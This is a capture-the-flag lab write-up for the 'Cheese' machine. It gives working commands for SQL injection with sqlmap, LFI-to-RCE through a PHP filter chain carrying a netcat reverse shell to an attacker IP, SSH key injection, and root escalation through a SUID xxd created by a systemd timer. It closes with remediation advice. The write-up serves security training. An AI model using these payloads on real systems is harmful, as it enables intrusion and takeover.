Target IP: cheese.thm (Requires /etc/hosts entry)
Difficulty: Medium/Hard
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Cheese” is a Linux machine that requires chaining multiple distinct vulnerability classes. Initial discovery involves bypassing a login panel via SQL Injection to uncover a hidden administrative script. This script contains a Local File Inclusion (LFI) vulnerability, which is escalated to Remote Code Execution (RCE) using advanced PHP Filter Chain exploitation. Lateral movement leverages poor file permissions on an SSH configuration. Root access is achieved by abusing a custom Systemd Timer which creates a SUID binary (xxd), allowing arbitrary file writes to the root directory.
Key TTPs (MITRE ATT&CK):
- T1190 (Exploit Public-Facing App): SQL Injection on login.
- T1059.006 (Python): Using PHP Filter Chain Generator tool.
- T1098 (Account Manipulation): Adding keys to
authorized_keys. - T1543 (Create or Modify System Process): Abusing Systemd Timers.
- T1548 (Abuse Elevation Control Mechanism): Exploiting SUID binary (
xxd).
2. Operational Setup
Host Configuration
echo "10.10.x.x cheese.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Nmap reveals many open ports (likely rabbit holes/teapots) and a web server.
nmap -sC -sV -oA nmap/cheese cheese.thmB. Web Enumeration
- Login Page:
http://cheese.thm/login.php - Fuzzing: Directory fuzzing reveals typical PHP structure but the login page is the primary gate.
4. Initial Access Phase 1: The SQL Injection
Standard credential stuffing failed. You correctly identified that sqlmap is the tool of choice here.
The Technique: SQLMap via Request File Instead of typing long URL parameters, saving the raw HTTP request from Burp Suite is professional and efficient.
- Capture: Intercept the login POST request in Burp Suite.
- Save: Right-click -> “Copy to file” ->
login.req. - Exploit:
sqlmap -r login.req --level=2 --risk=2 --batchResult:
SQLMap triggers a 302 Redirect to a hidden endpoint:
http://cheese.thm/secret-script.php?file=supersecretadminpanel.html
5. Initial Access Phase 2: LFI to RCE (PHP Filter Chains)
The Vulnerability
The URL secret-script.php?file=... screams Local File Inclusion (LFI).
- Check:
?file=php://filter/convert.base64-encode/resource=index.php(Standard LFI test). - Check:
?file=/etc/passwd(Verifies read access).
The Exploit: PHP Filter Chains
Standard LFI lets you read files. But we want to execute code. In modern PHP environments without file upload, PHP Filter Chains are the magic bullet. They abuse PHP’s stream filters to generate arbitrary characters, essentially allowing you to “write” a webshell into memory and execute it, purely via the GET parameter.
1. Generate Payload: Using synacktiv/php_filter_chain_generator:
python3 php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f"); ?>' | grep '^php' > payload.txt2. Execute:
# Setup listener
nc -lvnp 4444
# Fire payload
curl -s "http://cheese.thm/secret-script.php?file=$(cat payload.txt)"Status: Shell as www-data.
6. Lateral Movement: Writable SSH Keys
Enumeration
Running standard enumeration (or linpeas.sh) reveals a critical misconfiguration.
ls -la /home/comte/.ssh/authorized_keys
# -rw-rw-rw- 1 comte comte ... authorized_keysThe file is world-writable.
Exploitation
- Generate Key:
ssh-keygen -f id_ed25519(on attacker machine). - Inject Key:
echo "ssh-ed25519 AAAAC3Nz..." >> /home/comte/.ssh/authorized_keys- Login:
ssh -i id_ed25519 comte@cheese.thm.
Status: User comte.
7. Privilege Escalation: Systemd & SUID xxd
Enumeration
Checking sudo privileges:
sudo -l
# (ALL) NOPASSWD: /bin/systemctl start exploit.timer
# (ALL) NOPASSWD: /bin/systemctl enable exploit.timer
...Checking the associated service file:
cat /etc/systemd/system/exploit.serviceContent:
[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"The Logic Flaw
- The user
comtecannot editexploit.service(it is immutable). - However,
comtecan start theexploit.timervia sudo. - When the timer starts, it triggers
exploit.service. exploit.servicecopies the binaryxxdto/opt/xxdand sets the SUID bit (chmod +s).
Exploitation (GTFOBins)
1. Trigger the SUID Creation:
sudo /bin/systemctl start exploit.timer
# Verify
ls -la /opt/xxd
# -rwsr-sr-x 1 root root ... /opt/xxd2. Abusing xxd:
xxd is a hex dump tool. If it runs as SUID root, it can read any file and write any file. We use it to overwrite the root user’s SSH keys.
The Command:
# echo "YOUR_PUBLIC_KEY" | xxd | /opt/xxd -r - /root/.ssh/authorized_keys
echo 'ssh-ed25519 AAAAC3Nz...' | xxd | /opt/xxd -r - /root/.ssh/authorized_keysxxd(first one): Converts your key text into hex dump format./opt/xxd -r(SUID one): Reverts the hex dump back to binary/text and writes it to the target file (-means read from stdin).
3. Root Access:
ssh -i id_ed25519 root@cheese.thmRoot Flag: /root/root.txt
8. Remediation (Blue Team)
- Input Sanitization: Implement prepared statements to prevent SQL Injection on the login form.
- LFI Mitigation: Validate the
fileparameter against a whitelist of allowed files. Do not pass user input directly toinclude()orrequire(). - File Permissions:
authorized_keysshould be600(Read/Write by owner only).- Systemd service files executed by root should not create SUID binaries in public directories (
/opt).
- Sudo Principle of Least Privilege: Do not grant
systemctlpermissions to users unless strictly necessary, as it often leads to root escalation.